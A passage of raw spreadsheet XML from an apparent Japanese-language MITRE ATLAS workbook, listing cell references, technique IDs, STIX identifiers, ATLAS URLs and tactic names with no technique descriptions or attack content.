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D:\MITRE_ATLAS\"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{C8CD0301-AD76-4FF0-8ED5-6DFA26BE7E55}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="-110" yWindow="-110" windowWidth="38620" windowHeight="21100" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/>
  </bookViews>
  <sheets>
    <sheet name="techniques (ja)" sheetId="5" r:id="rId1"/>
    <sheet name="tactics (ja)" sheetId="6" r:id="rId2"/>
    <sheet name="mitigations (ja)" sheetId="7" r:id="rId3"/>
    <sheet name="matrix (ja)" sheetId="8"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5" l="1"/>
  <c r="H5" i="5"/>
  <c r="H3" i="5"/>
  <c r="H77" i="5"/>
  <c r="H2" i="5"/>
  <c r="H81" i="5"/>
  <c r="C16" i="8"/>
  <c r="C15" i="8"/>
  <c r="C14" i="8"/>
  <c r="C13" i="8"/>
  <c r="Y12" i="8"/>
  <c r="T12" i="8"/>
  <c r="C12" i="8"/>
  <c r="Z11" i="8"/>
  <c r="U11" i="8"/>
  <c r="Q11" i="8"/>
  <c r="M11" i="8"/>
  <c r="C11" i="8"/>
  <c r="Z10" i="8"/>
  <c r="U10" i="8"/>
  <c r="T10" i="8"/>
  <c r="Q10" i="8"/>
  <c r="M10" i="8"/>
  <c r="E10" i="8"/>
  <c r="D10" i="8"/>
  <c r="Z9" i="8"/>
  <c r="U9" i="8"/>
  <c r="Q9" i="8"/>
  <c r="P9" i="8"/>
  <c r="M9" i="8"/>
  <c r="F9" i="8"/>
  <c r="E9" i="8"/>
  <c r="D9" i="8"/>
  <c r="C9" i="8"/>
  <c r="A9" i="8"/>
  <c r="Z8" i="8"/>
  <c r="X8" i="8"/>
  <c r="W8" i="8"/>
  <c r="U8" i="8"/>
  <c r="Q8" i="8"/>
  <c r="M8" i="8"/>
  <c r="E8" i="8"/>
  <c r="C8" i="8"/>
  <c r="B8" i="8"/>
  <c r="Z7" i="8"/>
  <c r="Y7" i="8"/>
  <c r="W7" i="8"/>
  <c r="U7" i="8"/>
  <c r="T7" i="8"/>
  <c r="Q7" i="8"/>
  <c r="P7" i="8"/>
  <c r="M7" i="8"/>
  <c r="E7" i="8"/>
  <c r="C7" i="8"/>
  <c r="B7" i="8"/>
  <c r="Y6" i="8"/>
  <c r="W6" i="8"/>
  <c r="U6" i="8"/>
  <c r="Q6" i="8"/>
  <c r="P6" i="8"/>
  <c r="N6" i="8"/>
  <c r="J6" i="8"/>
  <c r="I6" i="8"/>
  <c r="H6" i="8"/>
  <c r="E6" i="8"/>
  <c r="D6" i="8"/>
  <c r="C6" i="8"/>
  <c r="B6" i="8"/>
  <c r="A6" i="8"/>
  <c r="Z5" i="8"/>
  <c r="Y5" i="8"/>
  <c r="W5" i="8"/>
  <c r="U5" i="8"/>
  <c r="P5" i="8"/>
  <c r="N5" i="8"/>
  <c r="J5" i="8"/>
  <c r="I5" i="8"/>
  <c r="G5" i="8"/>
  <c r="F5" i="8"/>
  <c r="D5" i="8"/>
  <c r="A5" i="8"/>
  <c r="Y4" i="8"/>
  <c r="X4" i="8"/>
  <c r="U4" i="8"/>
  <c r="S4" i="8"/>
  <c r="P4" i="8"/>
  <c r="N4" i="8"/>
  <c r="M4" i="8"/>
  <c r="K4" i="8"/>
  <c r="I4" i="8"/>
  <c r="H4" i="8"/>
  <c r="G4" i="8"/>
  <c r="F4" i="8"/>
  <c r="D4" i="8"/>
  <c r="C4" i="8"/>
  <c r="A4" i="8"/>
  <c r="Y3" i="8"/>
  <c r="X3" i="8"/>
  <c r="U3" i="8"/>
  <c r="S3" i="8"/>
  <c r="P3" i="8"/>
  <c r="M3" i="8"/>
  <c r="L3" i="8"/>
  <c r="K3" i="8"/>
  <c r="J3" i="8"/>
  <c r="H3" i="8"/>
  <c r="G3" i="8"/>
  <c r="F3" i="8"/>
  <c r="D3" i="8"/>
  <c r="A3" i="8"/>
  <c r="Y2" i="8"/>
  <c r="X2" i="8"/>
  <c r="W2" i="8"/>
  <c r="V2" i="8"/>
  <c r="U2" i="8"/>
  <c r="T2" i="8"/>
  <c r="S2" i="8"/>
  <c r="P2" i="8"/>
  <c r="O2" i="8"/>
  <c r="M2" i="8"/>
  <c r="L2" i="8"/>
  <c r="J2" i="8"/>
  <c r="H2" i="8"/>
  <c r="G2" i="8"/>
  <c r="F2" i="8"/>
  <c r="E2" i="8"/>
  <c r="D2" i="8"/>
  <c r="C2" i="8"/>
  <c r="A2" i="8"/>
  <c r="Y1" i="8"/>
  <c r="W1" i="8"/>
  <c r="V1" i="8"/>
  <c r="T1" i="8"/>
  <c r="S1" i="8"/>
  <c r="P1" i="8"/>
  <c r="O1" i="8"/>
  <c r="M1" i="8"/>
  <c r="L1" i="8"/>
  <c r="J1" i="8"/>
  <c r="H1" i="8"/>
  <c r="G1" i="8"/>
  <c r="E1" i="8"/>
  <c r="C1" i="8"/>
  <c r="A1" i="8"/>
  <c r="H141" i="5"/>
  <c r="H140" i="5"/>
  <c r="H139" i="5"/>
  <c r="H138" i="5"/>
  <c r="H137" i="5"/>
  <c r="H136" i="5"/>
  <c r="H134" i="5"/>
  <c r="H133" i="5"/>
  <c r="H131" i="5"/>
  <c r="H130" i="5"/>
  <c r="H127" i="5"/>
  <c r="H126" i="5"/>
  <c r="H125" i="5"/>
  <c r="H124" i="5"/>
  <c r="H123" i="5"/>
  <c r="H122" i="5"/>
  <c r="H121" i="5"/>
  <c r="H120" i="5"/>
  <c r="H119" i="5"/>
  <c r="H118" i="5"/>
  <c r="H117" i="5"/>
  <c r="H115" i="5"/>
  <c r="H114" i="5"/>
  <c r="H113" i="5"/>
  <c r="H112" i="5"/>
  <c r="H111" i="5"/>
  <c r="H110" i="5"/>
  <c r="H109" i="5"/>
  <c r="H106" i="5"/>
  <c r="H105" i="5"/>
  <c r="H104" i="5"/>
  <c r="H101" i="5"/>
  <c r="H100" i="5"/>
  <c r="H99" i="5"/>
  <c r="H98" i="5"/>
  <c r="H97" i="5"/>
  <c r="H96" i="5"/>
  <c r="H95" i="5"/>
  <c r="H93" i="5"/>
  <c r="H91" i="5"/>
  <c r="H90" i="5"/>
  <c r="H88" i="5"/>
  <c r="H87" i="5"/>
  <c r="H85" i="5"/>
  <c r="H84" i="5"/>
  <c r="H83" i="5"/>
  <c r="H82" i="5"/>
  <c r="H80" i="5"/>
  <c r="H79" i="5"/>
  <c r="H78" i="5"/>
  <c r="H76" i="5"/>
  <c r="H75" i="5"/>
  <c r="H74" i="5"/>
  <c r="H73" i="5"/>
  <c r="H72" i="5"/>
  <c r="H71" i="5"/>
  <c r="H70" i="5"/>
  <c r="H69" i="5"/>
  <c r="H68" i="5"/>
  <c r="H65" i="5"/>
  <c r="H64" i="5"/>
  <c r="H63" i="5"/>
  <c r="H62" i="5"/>
  <c r="H61" i="5"/>
  <c r="H60" i="5"/>
  <c r="H59" i="5"/>
  <c r="H58" i="5"/>
  <c r="H57" i="5"/>
  <c r="H56" i="5"/>
  <c r="H54" i="5"/>
  <c r="H53" i="5"/>
  <c r="H52" i="5"/>
  <c r="H51" i="5"/>
  <c r="H49" i="5"/>
  <c r="H48" i="5"/>
  <c r="H47" i="5"/>
  <c r="H46" i="5"/>
  <c r="H45" i="5"/>
  <c r="H44" i="5"/>
  <c r="H43" i="5"/>
  <c r="H42" i="5"/>
  <c r="H41" i="5"/>
  <c r="H39" i="5"/>
  <c r="H38" i="5"/>
  <c r="H37" i="5"/>
  <c r="H35" i="5"/>
  <c r="H34" i="5"/>
  <c r="H33" i="5"/>
  <c r="H31" i="5"/>
  <c r="H29" i="5"/>
  <c r="H28" i="5"/>
  <c r="H27" i="5"/>
  <c r="H26" i="5"/>
  <c r="H25" i="5"/>
  <c r="H24" i="5"/>
  <c r="H23" i="5"/>
  <c r="H22" i="5"/>
  <c r="H21" i="5"/>
  <c r="H20" i="5"/>
  <c r="H19" i="5"/>
  <c r="H17" i="5"/>
  <c r="H16" i="5"/>
  <c r="H15" i="5"/>
  <c r="H13" i="5"/>
  <c r="H12" i="5"/>
  <c r="H11" i="5"/>
  <c r="H10" i="5"/>
  <c r="H9" i="5"/>
  <c r="H8" i="5"/>
  <c r="H7" i="5"/>
  <c r="H6" i="5"/>
</calcChain>
</file>

<file path=xl/sharedStrings.xml><?xml version="1.0" encoding="utf-8"?>
<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="1128" uniqueCount="961">
  <si>
    <t>ID</t>
  </si>
  <si>
    <t>STIX ID</t>
  </si>
  <si>
    <t>AML.T0035</t>
  </si>
  <si>
    <t>attack-pattern--c7d79f0f-1c80-41d5-b6ef-3c1c53c34a06</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0035</t>
  </si>
  <si>
    <t>Collection</t>
  </si>
  <si>
    <t>ATLAS</t>
  </si>
  <si>
    <t>AML.T0008.000</t>
  </si>
  <si>
    <t>attack-pattern--253d4b38-c3b2-4c21-9239-9193c0500316</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0008.000</t>
  </si>
  <si>
    <t>AML.T0048.004</t>
  </si>
  <si>
    <t>attack-pattern--4bd0628d-3cdd-4411-9192-2af6c0f02287</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0048.004</t>
  </si>
  <si>
    <t>AML.T0040</t>
  </si>
  <si>
    <t>attack-pattern--fd10d38b-4428-4701-aa6b-39bcf961ac6d</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0040</t>
  </si>
  <si>
    <t>AML.T0010.001</t>
  </si>
  <si>
    <t>attack-pattern--cdf60b67-5511-42ba-b459-3aed5c3343f2</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0010.001</t>
  </si>
  <si>
    <t>AML.T0010</t>
  </si>
  <si>
    <t>attack-pattern--911b49e8-556c-4ca9-9dad-39040ec216db</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0010</t>
  </si>
  <si>
    <t>AML.T0047</t>
  </si>
  <si>
    <t>attack-pattern--eea9d0bf-847c-4120-bcfd-dc178b4c6649</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0047</t>
  </si>
  <si>
    <t>AML.T0008</t>
  </si>
  <si>
    <t>attack-pattern--056e4ffe-e0da-46ec-8dee-628a2fecacd0</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0008</t>
  </si>
  <si>
    <t>AML.T0002</t>
  </si>
  <si>
    <t>attack-pattern--4eb73819-e06c-46b1-8fe0-692be6af794d</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0002</t>
  </si>
  <si>
    <t>AML.T0006</t>
  </si>
  <si>
    <t>attack-pattern--c3a26e3e-3220-422c-b4b4-3913820fe6cf</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0006</t>
  </si>
  <si>
    <t>Reconnaissance</t>
  </si>
  <si>
    <t>AML.T0016.000</t>
  </si>
  <si>
    <t>attack-pattern--a1c0328f-7d6b-431f-85a9-59d0bc15786d</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0016.000</t>
  </si>
  <si>
    <t>AML.T0017.000</t>
  </si>
  <si>
    <t>attack-pattern--c63cb2b7-ad6f-4790-811d-5eca14caaec8</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0017.000</t>
  </si>
  <si>
    <t>AML.T0043.001</t>
  </si>
  <si>
    <t>attack-pattern--056578e2-7e26-496a-9dcd-0c1d05084da7</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0043.001</t>
  </si>
  <si>
    <t>AI Attack Staging</t>
  </si>
  <si>
    <t>AML.T0043.002</t>
  </si>
  <si>
    <t>attack-pattern--6001061b-5b84-4d5b-af1a-5a822c214184</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0043.002</t>
  </si>
  <si>
    <t>AML.T0067.000</t>
  </si>
  <si>
    <t>attack-pattern--dbe22826-20b1-4dc5-897b-fdcf89ef3ee3</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0067.000</t>
  </si>
  <si>
    <t>Defense Evasion</t>
  </si>
  <si>
    <t>AML.T0075</t>
  </si>
  <si>
    <t>attack-pattern--a9da00c7-7328-4a16-afce-04d0cd4f7290</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0075</t>
  </si>
  <si>
    <t>Discovery</t>
  </si>
  <si>
    <t>AML.T0050</t>
  </si>
  <si>
    <t>attack-pattern--eda10125-6f7d-479f-857a-19ef5d86a961</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0050</t>
  </si>
  <si>
    <t>AML.T0008.001</t>
  </si>
  <si>
    <t>attack-pattern--7afa4546-4cc9-4495-acb7-41b61ffb7650</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0008.001</t>
  </si>
  <si>
    <t>AML.T0010.004</t>
  </si>
  <si>
    <t>attack-pattern--c1ddecc2-a64a-4cd3-a3cb-cd295b829229</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0010.004</t>
  </si>
  <si>
    <t>AML.T0076</t>
  </si>
  <si>
    <t>attack-pattern--c5e79835-2002-4513-8de3-edaa7c3c1a3c</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0076</t>
  </si>
  <si>
    <t>AML.T0034</t>
  </si>
  <si>
    <t>attack-pattern--70660fc0-a4ba-4500-ac74-557fed97b06b</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0034</t>
  </si>
  <si>
    <t>AML.T0043</t>
  </si>
  <si>
    <t>attack-pattern--f95077b3-b1e0-4f4f-9baf-c0bd2f25416c</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0043</t>
  </si>
  <si>
    <t>AML.T0005</t>
  </si>
  <si>
    <t>attack-pattern--248bc7a1-0df9-41fc-aeb9-e267dc0577a9</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0005</t>
  </si>
  <si>
    <t>AML.T0010.002</t>
  </si>
  <si>
    <t>attack-pattern--ed8d9393-d6b3-4df8-8a27-c9d97f64cbf5</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0010.002</t>
  </si>
  <si>
    <t>AML.T0036</t>
  </si>
  <si>
    <t>attack-pattern--39d12ad5-28b3-4322-953e-d17ae74159cc</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0036</t>
  </si>
  <si>
    <t>AML.T0037</t>
  </si>
  <si>
    <t>attack-pattern--b432a102-8ef6-4f76-8287-7d99c4bd5e39</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0037</t>
  </si>
  <si>
    <t>AML.T0002.000</t>
  </si>
  <si>
    <t>attack-pattern--c05491e8-0c47-490d-8df3-26f7d4fdc629</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0002.000</t>
  </si>
  <si>
    <t>AML.T0029</t>
  </si>
  <si>
    <t>attack-pattern--1038acd6-a2d0-4fb5-93e8-e1702964182d</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0029</t>
  </si>
  <si>
    <t>AML.T0017</t>
  </si>
  <si>
    <t>attack-pattern--bd5c8094-54c8-45f6-82de-4ce8349fcd4a</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0017</t>
  </si>
  <si>
    <t>AML.T0051.000</t>
  </si>
  <si>
    <t>attack-pattern--2096e516-cb52-4131-a73d-0ef139258e4c</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0051.000</t>
  </si>
  <si>
    <t>AML.T0007</t>
  </si>
  <si>
    <t>attack-pattern--726a5898-ac81-4c62-b828-9f105556a907</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0007</t>
  </si>
  <si>
    <t>AML.T0014</t>
  </si>
  <si>
    <t>attack-pattern--9923b6b4-84f1-4ab4-8ccf-4d597db61a57</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0014</t>
  </si>
  <si>
    <t>AML.T0013</t>
  </si>
  <si>
    <t>attack-pattern--adf16819-dc11-46a7-b23a-0ea57ccc093c</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0013</t>
  </si>
  <si>
    <t>AML.T0063</t>
  </si>
  <si>
    <t>attack-pattern--dd1eaf06-1454-407d-b988-fab91c43c4f7</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0063</t>
  </si>
  <si>
    <t>AML.T0062</t>
  </si>
  <si>
    <t>attack-pattern--526f7326-7de2-43d1-96ea-ae85b7cde54e</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0062</t>
  </si>
  <si>
    <t>AML.T0069</t>
  </si>
  <si>
    <t>attack-pattern--251922b0-0e89-485b-9d7b-a292232c00d7</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0069</t>
  </si>
  <si>
    <t>AML.T0008.002</t>
  </si>
  <si>
    <t>attack-pattern--813ac9e1-b1b4-464b-8acf-ef10ac84c11e</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0008.002</t>
  </si>
  <si>
    <t>AML.T0078</t>
  </si>
  <si>
    <t>attack-pattern--4e2eac6a-fa8c-4bf8-967e-fdc3638c0cf9</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0078</t>
  </si>
  <si>
    <t>AML.T0018.002</t>
  </si>
  <si>
    <t>attack-pattern--b0b3327f-a064-4943-82b2-951fba172c6e</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0018.002</t>
  </si>
  <si>
    <t>AML.T0031</t>
  </si>
  <si>
    <t>attack-pattern--0691cb6f-ab52-4219-bb75-88c7ef77f02e</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0031</t>
  </si>
  <si>
    <t>AML.T0059</t>
  </si>
  <si>
    <t>attack-pattern--bf1b4fb5-5f17-42d1-ab74-b2b67f485f29</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0059</t>
  </si>
  <si>
    <t>AML.T0021</t>
  </si>
  <si>
    <t>attack-pattern--59ab5025-ad52-4e07-8c5a-e47be578cee5</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0021</t>
  </si>
  <si>
    <t>AML.T0015</t>
  </si>
  <si>
    <t>attack-pattern--6e6da90a-2d48-40cf-b27d-614360d96a1e</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0015</t>
  </si>
  <si>
    <t>AML.T0024</t>
  </si>
  <si>
    <t>attack-pattern--c606cfab-fa3d-4608-b01e-5f20ba14be1b</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0024</t>
  </si>
  <si>
    <t>Exfiltration</t>
  </si>
  <si>
    <t>AML.T0025</t>
  </si>
  <si>
    <t>attack-pattern--e5f71e81-5f3e-4a82-8e99-d911d3e912f9</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0025</t>
  </si>
  <si>
    <t>AML.T0049</t>
  </si>
  <si>
    <t>attack-pattern--dffdbcc7-6db6-45aa-bd7e-f3fb62781b1b</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0049</t>
  </si>
  <si>
    <t>AML.T0048</t>
  </si>
  <si>
    <t>attack-pattern--493d8a7f-63a0-419a-a8c7-74f85f1afab0</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0048</t>
  </si>
  <si>
    <t>AML.T0024.002</t>
  </si>
  <si>
    <t>attack-pattern--1a1d7e16-bb89-46dd-aa36-e65c9047bf28</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0024.002</t>
  </si>
  <si>
    <t>AML.T0056</t>
  </si>
  <si>
    <t>attack-pattern--2243a101-6295-4b82-8075-0c287d602a0e</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0056</t>
  </si>
  <si>
    <t>AML.T0071</t>
  </si>
  <si>
    <t>attack-pattern--46843164-cb30-4c02-bc73-10ae30c6082a</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0071</t>
  </si>
  <si>
    <t>AML.T0048.000</t>
  </si>
  <si>
    <t>attack-pattern--2e4aefac-93e9-42bc-9f19-300111f5de70</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0048.000</t>
  </si>
  <si>
    <t>AML.T0044</t>
  </si>
  <si>
    <t>attack-pattern--84295c1b-dfa5-44a8-bb1f-47dcd0915635</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0044</t>
  </si>
  <si>
    <t>AML.T0064</t>
  </si>
  <si>
    <t>attack-pattern--7eeb9b48-ed18-4e84-80b5-35b8223e3cf9</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0064</t>
  </si>
  <si>
    <t>AML.T0016.002</t>
  </si>
  <si>
    <t>attack-pattern--1da3c8bb-158a-4ce1-8a92-93b2dee4b9a9</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0016.002</t>
  </si>
  <si>
    <t>AML.T0010.000</t>
  </si>
  <si>
    <t>attack-pattern--7ff2727f-a254-4323-b182-e050bf0db8b0</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0010.000</t>
  </si>
  <si>
    <t>AML.T0073</t>
  </si>
  <si>
    <t>attack-pattern--21c89e42-5b62-4e44-b83d-33e0eebb1eed</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0073</t>
  </si>
  <si>
    <t>AML.T0051.001</t>
  </si>
  <si>
    <t>attack-pattern--83120ec7-b57c-49c5-a595-95a6982dfce0</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0051.001</t>
  </si>
  <si>
    <t>AML.T0024.000</t>
  </si>
  <si>
    <t>attack-pattern--5aa7eba8-9cd1-4d20-b6e6-81b1ec780c9c</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0024.000</t>
  </si>
  <si>
    <t>AML.T0043.004</t>
  </si>
  <si>
    <t>attack-pattern--746aeca6-ef05-4cad-8b29-5677cf1aa6d9</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0043.004</t>
  </si>
  <si>
    <t>AML.T0024.001</t>
  </si>
  <si>
    <t>attack-pattern--bf0aa41d-6932-48a8-a357-346ce7f15eef</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0024.001</t>
  </si>
  <si>
    <t>AML.T0000.000</t>
  </si>
  <si>
    <t>attack-pattern--0663b3da-43ac-4328-ad18-8fedf7a11b7a</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0000.000</t>
  </si>
  <si>
    <t>AML.T0057</t>
  </si>
  <si>
    <t>attack-pattern--d6c070bc-ed05-4f84-8ebc-48b2df8d1fac</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0057</t>
  </si>
  <si>
    <t>AML.T0054</t>
  </si>
  <si>
    <t>attack-pattern--ef74d856-323e-47d9-ad54-1f2a9a91fcf6</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0054</t>
  </si>
  <si>
    <t>AML.T0053</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0053</t>
  </si>
  <si>
    <t>AML.T0065</t>
  </si>
  <si>
    <t>attack-pattern--0c7c0e15-6279-4b1d-9707-3ce1a4dd4bb2</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0065</t>
  </si>
  <si>
    <t>AML.T0051</t>
  </si>
  <si>
    <t>attack-pattern--a920c087-f6ce-4d6f-b7b8-6b4bafc1c351</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0051</t>
  </si>
  <si>
    <t>AML.T0068</t>
  </si>
  <si>
    <t>attack-pattern--010bee3b-b3ce-4ba7-b936-16e8b56c4b3e</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0068</t>
  </si>
  <si>
    <t>AML.T0061</t>
  </si>
  <si>
    <t>attack-pattern--84dc16b9-496a-451e-9a3f-1a2d6c19adbe</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0061</t>
  </si>
  <si>
    <t>Persistence</t>
  </si>
  <si>
    <t>AML.T0077</t>
  </si>
  <si>
    <t>attack-pattern--60a5a4d5-78b3-4da4-89bc-d69e99333652</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0077</t>
  </si>
  <si>
    <t>AML.T0067</t>
  </si>
  <si>
    <t>attack-pattern--2562ad09-faa4-4cdf-b3fb-41bcf5e06b2f</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0067</t>
  </si>
  <si>
    <t>AML.T0011.001</t>
  </si>
  <si>
    <t>attack-pattern--24a70892-6962-43aa-bd44-59409b4f2803</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0011.001</t>
  </si>
  <si>
    <t>AML.T0018</t>
  </si>
  <si>
    <t>attack-pattern--aa9644dc-7314-4d43-b595-bf1aad275fe0</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0018</t>
  </si>
  <si>
    <t>AML.T0043.003</t>
  </si>
  <si>
    <t>attack-pattern--559daa3f-d332-47b8-8f9e-b883732564b4</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0043.003</t>
  </si>
  <si>
    <t>AML.T0074</t>
  </si>
  <si>
    <t>attack-pattern--502d0b4b-0e4b-4294-9d50-e01093f1c291</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0074</t>
  </si>
  <si>
    <t>AML.T0010.003</t>
  </si>
  <si>
    <t>attack-pattern--2dff830e-5644-41e7-93ff-fd0552da77fe</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0010.003</t>
  </si>
  <si>
    <t>AML.T0002.001</t>
  </si>
  <si>
    <t>attack-pattern--d9135863-13f5-4d54-9434-c24c29b75b15</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0002.001</t>
  </si>
  <si>
    <t>AML.T0018.001</t>
  </si>
  <si>
    <t>attack-pattern--291f82aa-907f-4ff9-a984-f04c1ab369bd</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0018.001</t>
  </si>
  <si>
    <t>AML.T0016</t>
  </si>
  <si>
    <t>attack-pattern--2b522145-c609-4950-a106-e8c416dd1b41</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0016</t>
  </si>
  <si>
    <t>AML.T0052</t>
  </si>
  <si>
    <t>attack-pattern--e65ae421-3b6c-449e-979f-b450d55d7423</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0052</t>
  </si>
  <si>
    <t>AML.T0008.003</t>
  </si>
  <si>
    <t>attack-pattern--3756561f-0794-4127-91db-76a227d0f322</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0008.003</t>
  </si>
  <si>
    <t>AML.T0041</t>
  </si>
  <si>
    <t>attack-pattern--68ec4fb6-15df-4841-abdd-8e0cd8534520</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0041</t>
  </si>
  <si>
    <t>AML.T0018.000</t>
  </si>
  <si>
    <t>attack-pattern--985c6a6f-cad4-4c6a-bf32-0c3c58d57519</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0018.000</t>
  </si>
  <si>
    <t>AML.T0020</t>
  </si>
  <si>
    <t>attack-pattern--3b88e298-97d5-451d-bbf5-1b13f5a2ade2</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0020</t>
  </si>
  <si>
    <t>AML.T0000.001</t>
  </si>
  <si>
    <t>attack-pattern--084cfcad-b515-4c14-b36a-d97ba9063850</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0000.001</t>
  </si>
  <si>
    <t>AML.T0060</t>
  </si>
  <si>
    <t>attack-pattern--5f879def-5cd4-45d3-b330-b5642ec2f741</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0060</t>
  </si>
  <si>
    <t>AML.T0019</t>
  </si>
  <si>
    <t>attack-pattern--2de4e5ad-3cd3-4e53-beb8-1809a5aad790</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0019</t>
  </si>
  <si>
    <t>AML.T0058</t>
  </si>
  <si>
    <t>attack-pattern--e8053731-4b16-4dbc-89e7-90accdffc0fd</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0058</t>
  </si>
  <si>
    <t>AML.T0070</t>
  </si>
  <si>
    <t>attack-pattern--66f96e17-ee2c-4e77-aeb2-08d4db84621a</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0070</t>
  </si>
  <si>
    <t>AML.T0048.001</t>
  </si>
  <si>
    <t>attack-pattern--9ce7dbb0-5b4e-480c-bec7-b7db65a1ad97</t>
  </si>
  <si>
    <t>https://atlas.mitre.org/techniques/AML.T0048.001</t>
  </si>
  <si>
    <t>AML.T0066</t>
  </si>
  <si>
